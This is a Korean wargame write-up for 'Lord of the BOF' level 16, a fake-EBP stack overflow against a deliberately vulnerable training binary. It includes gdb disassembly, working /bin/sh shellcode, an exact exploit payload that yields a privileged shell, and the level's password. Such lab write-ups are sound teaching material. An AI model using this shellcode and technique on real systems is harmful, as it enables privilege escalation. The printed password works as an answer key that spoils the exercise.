BOF 원정대 – Level 16 (zombie_assassin)

이번 문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
 char buffer[40];

 if(argc < 2){
 printf(argv error\n);
 exit(0);
 }

 if(argv[1][47] == '\xbf')
 {
 printf(stack retbayed you!\n);
 exit(0);
 }

 if(argv[1][47] == '\x40')
 {
 printf(library retbayed you, too!!\n);
 exit(0);
 }

 // strncpy instead of strcpy!
 strncpy(buffer, argv[1], 48); 
 printf(%s\n, buffer);
}

문제 주석을 보면 FEBP가 있는 여기서 FEBP는 Fake EBP를 의미하는 것으로 보인다.
Fake EBP 공격은 EBP를 변조한 후 RET 주소에 leave 명령어를 넣어 우리가 원하는 위치로 뛰게 하는 기법이다.

여기서는 우선 NOP + SHELLCODE 를 환경변수에 등록 후 버퍼에 해당 환경변수 주소값으로 채운 후 EBP를 buffer 위치로 이동시켜 공격을 하도록 하겠다. 그럼 우선 공격에 필요한 주소를 확인해 보도록 하자.

[assassin@localhost assassin]$ export SH=`python -c print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'` 
[assassin@localhost assassin]$ gdb zombie_assassin_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
---Type <return> to continue, or q <return> to quit---
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave 
0x80484e0 <main+160>: ret 
0x80484e1 <main+161>: nop 
0x80484e2 <main+162>: nop 
0x80484e3 <main+163>: nop 
0x80484e4 <main+164>: nop 
0x80484e5 <main+165>: nop 
0x80484e6 <main+166>: nop 
0x80484e7 <main+167>: nop 
0x80484e8 <main+168>: nop 
0x80484e9 <main+169>: nop 
0x80484ea <main+170>: nop 
0x80484eb <main+171>: nop 
0x80484ec <main+172>: nop 
0x80484ed <main+173>: nop 
0x80484ee <main+174>: nop 
0x80484ef <main+175>: nop 
---Type <return> to continue, or q <return> to quit---
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048446
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/assassin/zombie_assassin_tmp AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x8048446 in main ()
(gdb) x/32wx $esp
0xbffffa20: 0xbffffa48 0x4000a970 0x400f855b 0x080495a4
0xbffffa30: 0x4000ae60 0xbffffa94 0xbffffa48 0x0804842b
0xbffffa40: 0x08049590 0x080495a4 0xbffffa68 0x400309cb
0xbffffa50: 0x00000002 0xbffffa94 0xbffffaa0 0x40013868
0xbffffa60: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffa70: 0x08048440 0x00000002 0xbffffa94 0x080482e4
0xbffffa80: 0x0804851c 0x4000ae60 0xbffffa8c 0x40013e90
0xbffffa90: 0x00000002 0xbffffb8a 0xbffffbad 0x00000000
(gdb) 
0xbffffaa0: 0xbffffbcb 0xbffffbde 0xbffffbf5 0xbffffc14
0xbffffab0: 0xbffffc36 0xbffffc44 0xbffffe07 0xbffffe26
0xbffffac0: 0xbffffe44 0xbffffe59 0xbffffe79 0xbffffe84
0xbffffad0: 0xbfffff15 0xbfffff26 0xbfffff2e 0xbfffff3f
0xbffffae0: 0xbfffff49 0xbfffff57 0xbfffff68 0xbfffff76
0xbffffaf0: 0xbfffff81 0xbfffff95 0x00000000 0x00000003
0xbffffb00: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb10: 0x00000006 0x00000006 0x00001000 0x00000007
(gdb) 
0xbffffb20: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb30: 0x08048390 0x0000000b 0x00000203 0x0000000c
0xbffffb40: 0x00000203 0x0000000d 0x00000203 0x0000000e
0xbffffb50: 0x00000203 0x00000010 0x0febfbff 0x0000000f
0xbffffb60: 0xbffffb85 0x00000000 0x00000000 0x00000000
0xbffffb70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x38366900 0x682f0036 0x2f656d6f
0xbffffb90: 0x61737361 0x6e697373 0x6d6f7a2f 0x5f656962
(gdb) 
0xbffffba0: 0x61737361 0x6e697373 0x706d745f 0x41414100
0xbffffbb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbc0: 0x41414141 0x41414141 0x50004141 0x2f3d4457
0xbffffbd0: 0x656d6f68 0x7373612f 0x69737361 0x4552006e
0xbffffbe0: 0x45544f4d 0x54534f48 0x3239313d 0x3836312e
0xbffffbf0: 0x312e332e 0x534f4800 0x4d414e54 0x6f6c3d45
0xbffffc00: 0x686c6163 0x2e74736f 0x61636f6c 0x6d6f646c
0xbffffc10: 0x006e6961 0x5353454c 0x4e45504f 0x752f7c3d
(gdb) 
0xbffffc20: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069
0xbffffc30: 0x25206873 0x53550073 0x613d5245 0x73617373
0xbffffc40: 0x006e6973 0x435f534c 0x524f4c4f 0x6f6e3d53
0xbffffc50: 0x3a30303d 0x303d6966 0x69643a30 0x3b31303d
0xbffffc60: 0x6c3a3433 0x31303d6e 0x3a36333b 0x343d6970
0xbffffc70: 0x33333b30 0x3d6f733a 0x333b3130 0x64623a35
0xbffffc80: 0x3b30343d 0x303b3333 0x64633a31 0x3b30343d
0xbffffc90: 0x303b3333 0x726f3a31 0x3b31303d 0x333b3530
(gdb) 
0xbffffca0: 0x31343b37 0x3d696d3a 0x303b3130 0x37333b35
0xbffffcb0: 0x3a31343b 0x303d7865 0x32333b31 0x632e2a3a
0xbffffcc0: 0x303d646d 0x32333b31 0x652e2a3a 0x303d6578
0xbffffcd0: 0x32333b31 0x632e2a3a 0x303d6d6f 0x32333b31
0xbffffce0: 0x622e2a3a 0x303d6d74 0x32333b31 0x622e2a3a
0xbffffcf0: 0x303d7461 0x32333b31 0x732e2a3a 0x31303d68
0xbffffd00: 0x3a32333b 0x73632e2a 0x31303d68 0x3a32333b
0xbffffd10: 0x61742e2a 0x31303d72 0x3a31333b 0x67742e2a
(gdb) 
0xbffffd20: 0x31303d7a 0x3a31333b 0x72612e2a 0x31303d6a
0xbffffd30: 0x3a31333b 0x61742e2a 0x31303d7a 0x3a31333b
0xbffffd40: 0x7a6c2e2a 0x31303d68 0x3a31333b 0x697a2e2a
0xbffffd50: 0x31303d70 0x3a31333b 0x3d7a2e2a 0x333b3130
0xbffffd60: 0x2e2a3a31 0x31303d5a 0x3a31333b 0x7a672e2a
0xbffffd70: 0x3b31303d 0x2a3a3133 0x327a622e 0x3b31303d
0xbffffd80: 0x2a3a3133 0x3d7a622e 0x333b3130 0x2e2a3a31
0xbffffd90: 0x303d7a74 0x31333b31 0x722e2a3a 0x303d6d70
(gdb) 
0xbffffda0: 0x31333b31 0x632e2a3a 0x3d6f6970 0x333b3130
0xbffffdb0: 0x2e2a3a31 0x3d67706a 0x333b3130 0x2e2a3a35
0xbffffdc0: 0x3d666967 0x333b3130 0x2e2a3a35 0x3d706d62
0xbffffdd0: 0x333b3130 0x2e2a3a35 0x3d6d6278 0x333b3130
0xbffffde0: 0x2e2a3a35 0x3d6d7078 0x333b3130 0x2e2a3a35
0xbffffdf0: 0x3d676e70 0x333b3130 0x2e2a3a35 0x3d666974
0xbffffe00: 0x333b3130 0x4d003a35 0x54484341 0x3d455059
0xbffffe10: 0x36383369 0x6465722d 0x2d746168 0x756e696c
(gdb) 
0xbffffe20: 0x6e672d78 0x414d0075 0x2f3d4c49 0x2f726176
0xbffffe30: 0x6f6f7073 0x616d2f6c 0x612f6c69 0x73617373
0xbffffe40: 0x006e6973 0x55504e49 0x3d435254 0x6374652f
0xbffffe50: 0x706e692f 0x63727475 0x53414200 0x4e455f48
0xbffffe60: 0x682f3d56 0x2f656d6f 0x61737361 0x6e697373
0xbffffe70: 0x61622e2f 0x63726873 0x4e414c00 0x6e653d47
0xbffffe80: 0x0053555f 0x903d4853 0x90909090 0x90909090
0xbffffe90: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffffea0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffeb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffec0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffed0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffee0: 0x90909090 0x90909090 0x31909090 0xcd31b0c0
0xbffffef0: 0x89c38980 0xb0c031c1 0x3180cd46 0x2f6850c0
0xbfffff00: 0x6868732f 0x6e69622f 0x5350e389 0xd231e189
0xbfffff10: 0x80cd0bb0 0x474f4c00 0x454d414e 0x7373613d
(gdb) q
The program is running. Exit anyway? (y or n) y
[assassin@localhost assassin]$ 

1) leave 명령어 주소 : 0x80484df
2) buffer 시작 주소 : 0xbffffbad
3) NOP + SHELLCODE 환경변수 주소 : 0xbffffe90

이제 필요한 주소를 모두 확인하였으니 공격을 해보도록 하자. PAYLOAD는 아래와 같다.

[NOP + SHELLCODE 환경변수 주소, 0xbffffe90 * 10] [buffer 시작주소, 0xbffffbad] [leave 명령어주소, 0x80484df]

[assassin@localhost assassin]$ ./zombie_assassin `python -c print '\x90\xfe\xff\xbf'*10 + '\xad\xfb\xff\xbf' + '\xdf\x84\x04\x08'`
?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `python -c print '\x90\xfe\xff\xbf'*10 + '\xae\xfb\xff\xbf' + '\xdf\x84\x04\x08'` 
?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `python -c print '\x90\xfe\xff\xbf'*10 + '\xaf\xfb\xff\xbf' + '\xdf\x84\x04\x08'` 
?
bash$ id
uid=516(zombie_assassin) gid=515(assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$